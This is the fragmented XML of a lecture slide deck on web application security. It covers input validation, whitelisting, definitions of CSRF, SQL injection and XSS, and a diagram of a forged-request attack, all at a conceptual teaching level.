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31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11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312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313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79260"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="83" d="100"/>
          <a:sy n="83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39236-7D74-B54D-8D11-817930892BDA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/18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3FF22-2592-C14F-98C3-330CD27D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08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Big trend: software as a Web-based service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Online banking, shopping, government, bill payment, tax prep, customer relationship management, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cloud computing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Applications hosted on Web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Written in a mixture of PHP, Ruby, Java, Perl, ASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Security is rarely the main concern</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Poorly written scripts with inadequate input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Sensitive data stored in world-readable files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Recent push from Visa and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Mastercard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> to improve security of data management (PCI standard)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3FF22-2592-C14F-98C3-330CD27D5B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87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F0E22B58-5096-8348-BF81-B89F5E39A3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DD54AD78-898F-774F-B372-479BC0670462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11F25540-38AF-5B4E-8E9D-214FD33067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8075" cy="3481387"/>
          </a:xfrm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709E989F-CF6F-EA41-B9C6-B2247DB15A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8488"/>
            <a:ext cx="55880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893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5B1BE4F5-C2A8-0F43-8156-58E96AAF1E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80BA7542-7F6B-6744-829E-B471CCBAF1B7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27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4A22EEBA-CCF5-5843-A1EA-C20F81BF0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8075" cy="3481387"/>
          </a:xfrm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CAE134C9-8CF6-D64E-A5FB-A3BEFC15D6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8488"/>
            <a:ext cx="55880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8785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090901F9-D8DA-654F-AF34-91351AFDFB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7BCFF482-C923-B745-99A4-5CC12FDD3072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28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D83FE71C-86ED-CA47-8D78-DEF67ED4A0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8075" cy="3481387"/>
          </a:xfrm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5861F9A6-6157-2E45-BB78-32EA66704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8488"/>
            <a:ext cx="55880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9053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7BF2CCA5-508F-E540-AD0B-4546E4A8F9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6AD0827A-0654-5645-9D2E-FDFBB26CD7B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30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C51F7576-F0D5-3C40-AAC5-9EC2BE0BD3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8075" cy="3481387"/>
          </a:xfrm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7C2B996D-BFA3-D748-A2A3-ABDA73A06A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8488"/>
            <a:ext cx="55880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223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04946594-3CB3-2C4D-9C67-0FB267251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721F45D9-4B7E-2143-B739-D72F9596340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37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67036A94-3A00-1D44-96F1-AC1B144669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8075" cy="3481387"/>
          </a:xfrm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1BC34164-21DE-904C-8F12-02D280E198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8488"/>
            <a:ext cx="55880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328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208A2798-45F4-A74F-B153-9D2924E0DA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1021BE21-8421-EF4C-88D8-068DEC8F361B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41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68FDE0DA-FBAF-E249-83B4-A55832EF53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8075" cy="3481387"/>
          </a:xfrm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20003557-BC4A-594E-8D82-21FA872274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8488"/>
            <a:ext cx="55880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2071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4ADE0FA1-13E9-A74D-8A85-CE4D2FEA71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9358AE20-B8CB-DA4F-B32B-4919C8B2506F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42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9C0379C1-2221-6F42-87E1-967BF023B6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8075" cy="3481387"/>
          </a:xfrm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AFFA5411-6F07-004B-B32E-56B08450B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8488"/>
            <a:ext cx="55880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Validate all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Filter out any character that has special meaning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Apostrophes, semicolons, percent symbols, hyphens, underscores, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Check the data type (e.g., input must be an integer)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Whitelist permitted characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Blacklisting “bad” characters doesn’t work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Forget to filter out some characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Could prevent valid input (e.g., last name O’Brien)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Allow only well-defined set of safe values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Set implicitly defined through regular expressions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0882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9FAE6860-1458-5747-8991-B9BEF5C42B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2E852994-F3BB-4541-B4F5-08CCAB488A8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43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C9A42FC6-C4B6-D144-8C4E-E153F97583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8075" cy="3481387"/>
          </a:xfrm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AECC2662-7F1A-9542-9B99-42579DCB2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8488"/>
            <a:ext cx="55880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5309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FD57914C-FDEC-9B40-BE05-4DDD25ED7A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FC8E8403-59E0-AF4D-955E-85AC8BBCA24A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44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DACCD514-E6D8-874F-B444-B70D76F986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8075" cy="3481387"/>
          </a:xfrm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5E9AABBC-E3C6-EF48-A945-B085E3994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8488"/>
            <a:ext cx="55880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446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F0D0CB88-E439-4B4C-A6D4-FD963B8BD5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D90F146D-8F8C-A04D-AEF1-971083014000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45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0B0B9586-6CEE-9B4D-851A-52A55D9232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8075" cy="3481387"/>
          </a:xfrm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61E4A316-644E-5E4C-B3FB-BDC92C9AA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8488"/>
            <a:ext cx="55880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470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XSRF (CSRF) - cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Bad website forces the user’s browser to send a request to a good website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Malicious data sent to a website is interpreted as code in a query to the website’s back-end database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>XSS (CSS) – cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Malicious code injected into a trusted context (e.g., malicious data presented by an honest website interpreted as code by the user’s browser)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3FF22-2592-C14F-98C3-330CD27D5B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76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767CD253-8B07-B04E-B216-F6AFE1A445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50D3A46B-7D89-5741-9925-A6E3C90E7F8D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46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CDCD93C0-68B9-3742-BC64-ADB70960DC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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm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4FD95F27-BE0D-244B-943A-F39902576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658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3FF22-2592-C14F-98C3-330CD27D5B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01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/>
              <a:t>Dynamically generated HTML pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Content from many different sources, often including users themselves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Blogs, social networks, photo-sharing websites…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3FF22-2592-C14F-98C3-330CD27D5B6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52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2C477B51-3C8C-A44C-A85C-3DE3271558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CC35D890-AA6C-4F41-BAA6-38889DF8578B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1E713DB6-62D0-2640-BD25-DE794909DF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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm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EE54D725-CD9A-B643-A86E-62D7C2C6C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450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82E4EC21-2F0C-CB40-A325-A0BE5DF7B6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3FBF3EF0-6CBA-B040-9189-9D839BDB9A28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93359B29-6294-CF4B-8677-8C3B2E9A45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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm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007BE126-6973-BB44-A882-56260DD96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747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0D7AE903-07D2-3541-AD95-DBAAFD5650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B9915AC4-D4E9-BA4F-903B-9547364004F9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4C69AA53-60E5-754F-B549-5D9AED06D9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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800"/>
          </a:xfrm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A9E97EED-031A-884E-8C45-12EB6E783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6406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6485B939-41B4-2E44-A322-EF398736A2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1A9CC8AB-727C-9743-8F49-894F89BFD269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351EB657-104C-4543-9818-B8EC4415FB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1638" y="696913"/>
            <a:ext cx="6184900" cy="3479800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AA5D5586-4839-6E40-AC77-06CCDC6F14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788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0B86EE64-ECC4-3C40-A301-D836A1845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1A855AFB-6D2F-5743-BC8D-F02153EB52B9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97843647-9892-384E-988F-345AB58782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8075" cy="3481387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1A1E7146-3012-B44F-AD45-3F8349BCF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4408488"/>
            <a:ext cx="5588000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544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8E55-C1CE-3E4F-92D8-12661F0EC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BD602-EB5A-B641-9394-D9425DBBC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63E09-9546-6A47-98C7-A1D39D8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235E-3FD8-5642-8EA7-65FDB82F4182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B523B-33FE-EE4F-963D-41720023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3D780-B47A-3041-BB39-17BFDA24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D4C-0517-2647-90F8-6C472F6C1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6B57-78FE-A647-A7A8-930230A6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CCD22-7DBF-2244-A203-D5B5284FE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C8960-180F-1941-8A25-A83F4FDF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235E-3FD8-5642-8EA7-65FDB82F4182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F8133-6141-F343-9CFC-CE48641D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83CC3-1FD6-FA45-B857-F8AF1BFC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D4C-0517-2647-90F8-6C472F6C1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E51A8-71AC-2944-94FD-6E50D5E3A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BC004-27C3-334F-9F7E-FD0C92C62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DA5F6-980F-0C45-BFF1-08A81EB7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235E-3FD8-5642-8EA7-65FDB82F4182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31C1E-89B0-2A4E-BF4F-6E92786C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97FB5-4EA0-8448-BAAC-E78FEB94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D4C-0517-2647-90F8-6C472F6C1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9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73F5-BCEA-E14C-83FC-126B93BE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E4066-A8A6-FC40-805A-1C4ACC780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18B8D-DBA0-734F-9FF6-D93F6876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235E-3FD8-5642-8EA7-65FDB82F4182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0EF3B-CF8B-9744-A27F-393118AD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958B0-015E-4243-8CFF-16BBB3BF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D4C-0517-2647-90F8-6C472F6C1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3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B25D-AB23-F04A-9999-50D0BAB3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C9681-567D-BE46-A851-759663A57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19026-E21C-004F-A638-25A6FE3D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235E-3FD8-5642-8EA7-65FDB82F4182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CB6A8-0E42-7948-A5A1-560AEC81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65DEA-F0E4-784B-A4F5-99778185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D4C-0517-2647-90F8-6C472F6C1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8C0F-F780-4949-B5D5-AC8CB8BD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16EA-B824-E449-A69B-9B7CC901B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4F548-778F-F343-8D26-89A683EAB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08992-1F29-084E-BC96-8C1CD80B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235E-3FD8-5642-8EA7-65FDB82F4182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FC653-72C2-404C-ADB2-DC36DA94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D1A10-90FB-EA45-B8B2-363BB8CA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D4C-0517-2647-90F8-6C472F6C1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4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B0405-A159-6644-960B-9592269B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191EC-6C98-6F4B-87EB-EC4884444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E6353-07B8-3F47-90CB-980148F84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BB0D2-9F69-3C47-832F-40677D498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19029-98FB-E04D-9B0F-5B0BAD3B2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AC416-B599-BC44-BE9F-AB1A1DE5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235E-3FD8-5642-8EA7-65FDB82F4182}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/18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EBDBAA-0E6C-8249-813F-0463A3F7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4406D-54C4-E14A-B8FC-0F2D70A0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D4C-0517-2647-90F8-6C472F6C1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0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151C-8F51-284D-8546-3458862A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089038-FA10-C14A-B66D-558213EB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235E-3FD8-5642-8EA7-65FDB82F4182}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/18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1DE6E-15BE-9341-8D1E-B906CA8EA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FB5EE-F584-854B-A7AE-61AD80FE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D4C-0517-2647-90F8-6C472F6C1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7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EEA90F-1D57-5647-85DF-FFE0389B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235E-3FD8-5642-8EA7-65FDB82F4182}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/1/18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3D9CB-B9B2-024B-B7CA-0EBA6B40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90D6F-A4A8-B745-9B1D-605003F0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D4C-0517-2647-90F8-6C472F6C1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2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615C-328B-C445-942C-10825EB6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19DF0-D069-7F4E-8F1F-988EBF168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11771-C35D-EA46-B473-52CC59363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6FAD6-A254-7448-B591-F3477FA5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235E-3FD8-5642-8EA7-65FDB82F4182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F6059-9437-7244-BC25-B5036E38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078F8-9287-B246-9EB0-821F1556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D4C-0517-2647-90F8-6C472F6C1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1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FACB-E4F1-B346-BBA9-41A956168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7215E-5689-7748-8307-91B89F0B6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08D28-003C-4A40-A1B8-2849FA010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AB717-54D2-ED4A-9759-586F810A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235E-3FD8-5642-8EA7-65FDB82F4182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7F04C-ECDB-E244-9E66-1F4C39D3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842B3-D3A9-1742-82E8-F4186900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D4C-0517-2647-90F8-6C472F6C1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5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43351-903B-5E4A-8DE0-55ABC067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C6199-12FC-A04E-B31C-CD21A0496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E1C5B-2C45-2144-B816-A1FB39E8D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9235E-3FD8-5642-8EA7-65FDB82F4182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BB49A-7991-894D-AFF4-082F009E7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0EC70-5DD2-4242-B604-D116D0CE4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07D4C-0517-2647-90F8-6C472F6C1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zzdb-project/fuzzdb/blob/master/attack/all-attacks/all-attacks-unix.txt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_injection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hegeekstuff.com/2012/02/xss-attack-examples/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)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71F2-0D21-4442-8A71-26630CD92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Application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6C3E0-1D7A-8F4A-A252-12A297F46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Ch. 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>slides from the Stanford Web security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3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2" descr="basic-csrf-black">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A396AB06-AB39-3840-AA18-A8EB30596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1462088"/>
            <a:ext cx="8350250" cy="539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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E832B4CD-77C8-D744-A45E-0FB90561F3BD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4267200"/>
            <a:ext cx="2590800" cy="2427288"/>
            <a:chOff x="4191000" y="4267200"/>
            <a:chExt cx="2590800" cy="2426988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16391" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF17B6A-FC6E-AC47-A9B5-174D8E142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6232525"/>
              <a:ext cx="2353656" cy="46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9" tIns="45719" rIns="91439" bIns="45719"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>
                  <a:solidFill>
                    <a:srgbClr val="202346"/>
                  </a:solidFill>
                  <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>User credentials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D1E40F-579D-4544-8EBB-5706B890E5E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4479925" y="4267200"/>
              <a:ext cx="2301875" cy="479366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19" rIns="91439" bIns="45719" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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5D8ECAA-8E7E-514A-ADC6-7D3DAC4F74EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618130" y="5217961"/>
              <a:ext cx="1485716" cy="54292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88" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8DF8B2-7F14-E14D-809D-14345CC0F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9" y="4403725"/>
            <a:ext cx="21224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96" tIns="41148" rIns="82296" bIns="41148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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="202346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Cookie: SessionID=523FA4cd2E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Title 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C8E1AA-663F-494C-AFA1-BE056AA5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Cookies in Forged Requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BE4363-E5D0-0244-8774-96D4E82A3BDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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19DAF49F-AE18-BE45-A3D1-5B4A0B17C8C5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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24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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8141CC6-7D24-0345-967A-D431D4E7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XSRF (aka CSRF): Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02B4CD34-51F9-A64D-B34F-6AA503B98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74964"/>
            <a:ext cx="1436688" cy="14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11" descr="CompaqAlphaServerES40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2096DA8-5246-A348-BD9E-A4A0A018F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538" y="1855788"/>
            <a:ext cx="1155700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 descr="DS15serverfront">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D857942-D120-BB41-8AC2-4BDABA63B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5173664"/>
            <a:ext cx="2436813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5" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55136AC5-1525-0D45-BF74-3E77F0A7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14" y="4792663"/>
            <a:ext cx="15529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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114696" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C0490D-972A-6F48-B798-228A73FAD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8663" y="1428750"/>
            <a:ext cx="16047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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17416" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F60E675-8FFA-2041-B30A-5090174E835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51288" y="2257425"/>
            <a:ext cx="2830512" cy="61753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698" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617DB71C-8B3F-FE49-946B-B177CDCB1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248150"/>
            <a:ext cx="13612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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114699" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBE11E5D-9C9E-3041-BE78-E9F488CF8A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20890924">
            <a:off x="4359940" y="2070070"/>
            <a:ext cx="19243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/>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17419" name="Straight Arrow Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53F92A70-79C6-7E4E-98F3-0813103B6675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352801" y="4572000"/>
            <a:ext cx="2906713" cy="10668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01" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315ADBB9-134D-A844-BCF9-95882D8FE40D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20856438">
            <a:off x="4269398" y="2786033"/>
            <a:ext cx="22704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/>
              <a:t>send forged request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17421" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6206AFCC-DB71-B542-BEEB-7EEDA6ABCB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98888" y="3962400"/>
            <a:ext cx="2830512" cy="9906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03" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B81C06F-1FED-BC42-8077-1DB9B677192A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="4573589" y="4070350"/>
            <a:ext cx="165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sz="2000"/>
              <a:t>visit server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114704" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A977C0B0-AB7C-B64C-893E-9CEA918573D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3721101" y="4702175"/>
            <a:ext cx="29321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sz="2000"/>
              <a:t>receive malicious page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Oval 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC1DADF-A067-C24D-8BC8-71D26657A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076" y="2301876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17425" name="Oval 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B7F100A-B5A7-8B45-AEAC-B41B72DCB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076" y="3733801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17426" name="Oval 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21DA2AA7-2DD2-4B41-ADF9-7C692B84B460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="3476626" y="4159251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/>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17427" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6181EEB-E461-CF46-BD58-7733B10CEB8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62401" y="2963864"/>
            <a:ext cx="2830513" cy="61753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8" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC39C59B-3C5C-344A-B99F-A2402456C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1" y="3124201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114710" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA8E398-7A98-F544-B580-4F1E78CAE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214" y="6096000"/>
            <a:ext cx="65127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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: how long do you stay logged on to Gmail?  Financial sites?</a:t>
            </a:r>
